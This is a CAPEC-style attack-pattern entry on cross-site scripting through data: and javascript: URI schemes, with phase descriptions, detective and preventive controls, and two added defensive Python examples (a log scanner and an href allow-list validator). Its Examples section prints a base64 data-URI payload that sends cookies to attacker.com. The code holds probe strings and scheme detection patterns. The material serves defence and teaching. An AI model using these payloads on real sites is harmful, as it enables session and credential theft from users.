An attack of this type exploits the ability of most browsers to interpret
“data”, “javascript” or other URI schemes as client-side executable content
placeholders. The attack consists of passing a malicious URI in an anchor
tag HREF attribute or in any similar attribute of other HTML tags. Such a
malicious URI contains, for example, base64 encoded HTML content with an
embedded cross-site scripting payload. The attack is executed when the
browser interprets the malicious content, for example when the victim
clicks on the malicious link.
Attack Execution Flow
Explore
Survey the application:: Using a browser or an automated tool, an attacker
follows all public links on a web site. He records all the links he finds.
Attack Step Techniques
1. Use a spidering tool to follow and record all links. Make special note of
any links that include parameters in the URL. (env-Web)
2. Use a proxy tool to record all links visited during a manual traversal of
the web application. Make special note of any links that include parameters
in the URL. Manual traversal of this type is frequently necessary to
identify forms that are GET method forms rather than POST forms. (env-Web)
3. Use a browser to manually explore the website and analyze how it is
constructed. Many browser plugins are available to facilitate the analysis
or automate the URL discovery. (env-Web)
Indicators
1. Positive: URL parameters are used by the application or the browser
(DOM) in a context that is originally used for storing a URL (anchor’s
“href”, script’s “src”, etc.). (env-Web)
2. Inconclusive: Using URL rewriting, parameters may be part of the URL
path. (env-Web)
3. Inconclusive: No parameters appear on the URL. Even though none appear,
the web application may still use them if they are provided. (env-Web)
4. Negative: Applications that have only static pages or that simply present
information without accepting input are unlikely to be susceptible. (env-Web)
Experiment
Attempt injection payload variations on input parameters:: Possibly using
an automated tool, an attacker requests variations on the inputs he surveyed
before. He sends parameters that include variations of payloads. He records
all the responses from the server that include unmodified versions of his
script.
Attack Step Techniques
1. Use a list of XSS probe strings using different URI schemes to inject in
parameters of known URLs. If possible, the probe strings contain a unique
identifier to trace the injected string back to the entry point. (env-Web)
2. Use a proxy tool to record results of manual input of XSS probes in known
URLs. (env-Web)
Indicators
1. Positive: Input parameters are printed back in a URL placeholder that
supports different URI schemes, such as HREF, SRC, and other attributes.
(env-Web)
2. Inconclusive: Nothing is returned to the web page. The payload may be
stored to be served later. The unique identifier from the probe helps to
trace the flow of the possible XSS. (env-Web)
Outcomes
1. Success: The attacker's cross-site scripting string is included in the
URI scheme content and can be triggered by a user (a victim in this case).
2. Failure: Custom URI schemes aren’t allowed by the application.
3. Inconclusive: Some sensitive characters are consistently encoded, but
others are not.
Security Controls
1. Detective: Monitor input to web servers, application servers, and other
HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes.
The majority of attackers use well known strings to check for
vulnerabilities. Use the same vulnerability catalogs that hackers use.
2. Preventative: Apply appropriate input validation to filter all
user-controllable input of scripting syntax.
3. Preventative: Do not embed user-controllable input in generated HTTP
headers.
4. Preventative: Actively monitor the application and either deny or
redirect requests from origins that appear to be generating XSS probes.
Once the attacker succeeds in exploiting the vulnerability, he can choose to
steal the user's credentials in order to reuse or analyze them later on.
Attack Step Techniques
1. Develop malicious JavaScript that is injected through vectors identified
during the Experiment Phase, is loaded by the victim's browser, and sends
document information to the attacker. (env-Web)
2. Develop malicious JavaScript that is injected through vectors identified
during the Experiment Phase, takes commands from an attacker's server, and
then causes the browser to execute them accordingly. (env-Web)
Outcomes
1. Success: The attacker gets the user's cookies or other session
identifiers.
2. Success: The attacker gets the content of the page the user is viewing.
3. Success: The attacker causes the user's browser to visit a page with
malicious content.
Security Controls
1. Detective: Monitor server logs for scripting parameters.
2. Detective: Monitor server logs for referrers. If users are being tricked
into clicking XSS links through forums or other web postings, their web
browsers will be providing Referrer headers most of the time. These can
help indicate that the actual request is illegitimate.
3. Preventative: Apply appropriate input validation to filter all
user-controllable input of scripting syntax.
4. Preventative: Appropriately encode all browser output to avoid scripting
syntax.
5. Preventative: Actively monitor the application and either deny or
redirect requests from origins that appear to be generating XSS probes.
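The detective controls listed in the Experiment and Exploit phases (alert on standard XSS probes at the HTTP tier; monitor server logs for scripting parameters and for referrers) can be implemented as a log scan. The Python script below is an added example and is not part of this CAPEC entry: it parses a few constructed Combined Log Format lines, percent-decodes each query parameter value repeatedly to catch double-encoded probes, strips the control and whitespace characters a browser ignores while parsing a scheme, and reports every request whose parameter value begins with an executable URI scheme, together with the Referer that arrived with it. The log lines, addresses, paths and the "probe-7f3a" marker are constructed for the example; the log format is assumed to be the Apache/nginx "combined" format.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" log format (assumed to be what the web tier writes).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Schemes that browsers treat as executable content in a URL placeholder.
SCRIPT_SCHEMES = ("javascript:", "data:", "vbscript:")

# Control and whitespace characters a browser drops while parsing a scheme.
_IGNORED = re.compile(r"[\x00-\x20\x7f]")

# Constructed sample log lines (addresses, paths and probe marker are made up).
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /redirect?url=https%3A%2F%2Fexample.com%2F HTTP/1.1" 302 0 "https://example.com/" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /redirect?url=javascript%3Aalert%28%27probe-7f3a%27%29 HTTP/1.1" 200 512 "http://forum.example/thread/42" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /redirect?url=%2564ata%253Atext%252Fhtml%253Bbase64%252CPGh0bWw%252B HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:42 +0000] "GET /redirect?url=jav%09ascript%3Aalert%281%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def normalize(value, rounds=3):
    """Percent-decode up to `rounds` times (double-encoded probes), then drop
    the characters a browser ignores inside a scheme and lowercase the result."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return _IGNORED.sub("", value).lower()


def scheme_probe(value):
    """Return the executable scheme name a parameter value starts with, or None."""
    norm = normalize(value)
    for scheme in SCRIPT_SCHEMES:
        if norm.startswith(scheme):
            return scheme.rstrip(":")
    return None


def scan_log(lines):
    """Return one finding per query parameter whose value carries an executable
    URI scheme; the Referer is kept because it shows where the link was planted."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            scheme = scheme_probe(value)
            if scheme:
                hits.append({"ip": m.group("ip"), "param": name,
                             "scheme": scheme, "referer": m.group("referer")})
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print("{ip} param={param} scheme={scheme} referer={referer}".format(**hit))
```

Run against the sample, the first line (a plain https redirect target) produces no finding, while the three probe lines are reported with their scheme; the second hit is only recognised because the value is decoded twice, and the fourth only because the embedded tab is removed before the prefix check. In practice the same normalisation should be applied to POST bodies and headers, since the injection vector section below notes that any HTTP transport variable can carry the payload.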
Forceful browsing:: When the attacker targets the current application or
another one (through CSRF vulnerabilities), the user will be the one who
performs the attacks without being aware of it. These attacks mostly target
application logic flaws, but they can also be used to create a widespread
attack against a particular website on the user's current network (Internet
or not).
Attack Step Techniques
1. Develop malicious JavaScript that is injected through vectors identified
during the Experiment Phase, is loaded by the victim's browser, and performs
actions on the same web site. (env-Web)
2. Develop malicious JavaScript that is injected through vectors identified
during the Experiment Phase, takes commands from an attacker's server, and
then causes the browser to execute requests to other web sites (especially
web applications that have CSRF vulnerabilities). (env-Web)
Outcomes
1. Success: The attacker indirectly controls the user's browser and makes it
perform actions exploiting CSRF.
2. Success: The attacker manipulates the browser through the steps that he
designed in his attack. The user, identified on a website, is now
performing actions he is not aware of.
Security Controls
1. Detective: Monitor server logs for scripting parameters.
2. Detective: Monitor server logs for referrers. If users are being tricked
into clicking XSS links through forums or other web postings, their web
browsers will be providing Referrer headers most of the time. These can
help indicate that the actual request is illegitimate.
3. Preventative: Apply appropriate input validation to filter all
user-controllable input of scripting syntax.
4. Preventative: Appropriately encode all browser output to avoid scripting
syntax.
5. Preventative: Actively monitor the application and either deny or
redirect requests from origins that appear to be generating XSS probes.
Content spoofing:: By manipulating the content, the attacker targets the
information that the user would like to get from the website.
Attack Step Techniques
1. Develop malicious JavaScript that is injected through vectors identified
during the Experiment Phase, is loaded by the victim's browser, and exposes
attacker-modified invalid information to the user on the current web page.
(env-Web)
Outcomes
1. Success: The user sees a page containing wrong information.
Security Controls
1. Detective: Monitor server logs for scripting parameters.
2. Detective: Monitor server logs for referrers. If users are being tricked
into clicking XSS links through forums or other web postings, their web
browsers will be providing Referrer headers most of the time. These can
help indicate that the actual request is illegitimate.
3. Preventative: Apply appropriate input validation to filter all
user-controllable input of scripting syntax.
4. Preventative: Appropriately encode all browser output to avoid scripting
syntax.
5. Preventative: Actively monitor the application and either deny or
redirect requests from origins that appear to be generating XSS probes.
Attack Prerequisites
Target client software must allow scripting such as JavaScript and allow
executable content delivered using a data URI scheme.
Typical Likelihood of Exploit
Likelihood: High
Methods of Attack
Injection
Protocol Manipulation
Examples-Instances
Description
The following payload
data:text/html;base64,PGh0bWw+PGJvZHk+PHNjcmlwdD52YXIgaW1nID0gbmV3IEltYWdlKCk7IGltZy5zcmMgPSAiaHR0cDovL2F0dGFja2VyLmNvbS9jb29raWVncmFiYmVyPyIrIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWVzKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==
represents base64 encoded HTML and uses the data URI scheme to deliver it
to the browser. The decoded payload is the following piece of HTML code:
<html><body><script>var img = new Image(); img.src = "http://attacker.com/cookiegrabber?"+ encodeURIComponent(document.cookies);</script></body></html>
Web applications that take user controlled inputs and reflect them in a
URI HTML placeholder without proper validation are at risk of such an
attack. An attacker could inject the previous payload so that it is placed
in a URI placeholder (for example in the anchor tag HREF attribute):
<a href="INJECTION_POINT">My Link</a>
Once the victim clicks on the link, the browser decodes and executes the
content of the payload. This results in the execution of the cross-site
scripting attack.
Attacker Skills or Knowledge Required
Skill or Knowledge Level: Medium
To inject the malicious payload in a web page
Resources Required
Ability to send HTTP requests to a web application
Solutions and Mitigations
Design: Use browser technologies that do not allow client side
scripting.
Design: Utilize strict type, character, and encoding enforcement.
Implementation: Ensure all content that is delivered to client is
sanitized against an acceptable content specification.
Implementation: Ensure all content coming from the client is using the
same encoding; if not, the server-side application must canonicalize the
data before applying any filtering.
Implementation: Perform input validation for all remote content, including
remote and user-generated content
Implementation: Perform output validation for all remote content.
Implementation: Disable scripting languages such as JavaScript in the
browser.
Implementation: Patch software. There are many attack vectors for XSS on
the client side and the server side. Many vulnerabilities are fixed in
service packs for browsers, web servers, and plug-in technologies; staying
current on patch releases that deal with XSS countermeasures mitigates
this.
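The preventative measures above (reject custom URI schemes, canonicalize before filtering, validate input and encode output) come together in a server-side check on any user-supplied link target before it is written into an anchor's href. The Python code below is an added example, not code from this CAPEC entry: it canonicalizes the value the way a browser would (HTML entity decoding of the attribute value, then removal of the control and whitespace characters a browser ignores inside a scheme), enforces a scheme allow-list, and HTML-encodes the attribute and link text on output. The allow-list contents and the rejection of protocol-relative URLs are an assumed policy, and the sample inputs are constructed.

```python
import html
import re
from urllib.parse import urlsplit

# Schemes this (assumed) policy allows in a user-supplied link target.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Browsers ignore ASCII control characters and whitespace while parsing a
# scheme, so "java\tscript:" and "javascript:" are the same to them.
_CONTROL_WS = re.compile(r"[\x00-\x20\x7f]")


def canonicalize_href(raw):
    """Undo the transformations a browser applies before it sees the scheme:
    HTML entity decoding of the attribute value (so "&#106;avascript:" becomes
    "javascript:"), then removal of control and whitespace characters."""
    return _CONTROL_WS.sub("", html.unescape(raw))


def is_allowed_href(raw):
    """Allow-list check on the canonical scheme. Relative URLs are accepted
    except protocol-relative ones (//host/...), which this policy rejects."""
    url = canonicalize_href(raw)
    scheme = urlsplit(url).scheme.lower()
    if scheme == "":
        return not url.startswith("//")
    return scheme in ALLOWED_SCHEMES


def render_link(raw_href, text, fallback="#"):
    """Emit an anchor tag: the href is validated (input validation) and both
    the attribute and the link text are HTML-encoded (output encoding)."""
    href = canonicalize_href(raw_href) if is_allowed_href(raw_href) else fallback
    return '<a href="{}">{}</a>'.format(html.escape(href, quote=True),
                                        html.escape(text))


if __name__ == "__main__":
    # Constructed inputs: one benign link and several URI-scheme variants.
    for candidate in ("https://example.com/?q=1&page=2",
                      "/account/settings",
                      "javascript:alert(1)",
                      "data:text/html;base64,PGh0bWw+PGJvZHk+",
                      " JaVa\tScRiPt:alert(1)",
                      "&#106;avascript:alert(1)",
                      "//evil.example/x"):
        print(repr(candidate), "->", render_link(candidate, "My Link"))
```

The check is deliberately an allow-list on the canonical scheme rather than a block-list of "javascript:" and "data:" strings: the mixed-case, tab-separated and entity-encoded variants in the sample all reach the same scheme after canonicalization, which is exactly the case the "Inconclusive: some sensitive characters are consistently encoded, but others are not" outcome warns about. Values that fail the check are replaced by an inert fallback rather than partially filtered.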
Attack Motivation-Consequences
Integrity: Modify files or directories
Confidentiality: Read files or directories
Integrity: Modify application data
Confidentiality: Read application data
Authorization: Execute unauthorized code or commands
Accountability, Authentication, Authorization, Non-Repudiation: Gain
privileges / assume identity
Access_Control, Authorization: Bypass protection mechanism
Injection Vector
Any HTTP Request transport variables (GET, POST, Headers, etc.)
Payload
XSS malicious script leveraging URI schemes
Activation Zone
Client web browser where script is executed
Payload Activation Impact
Description
Client web browser may be used to steal session data, passwords, cookies,
and other tokens.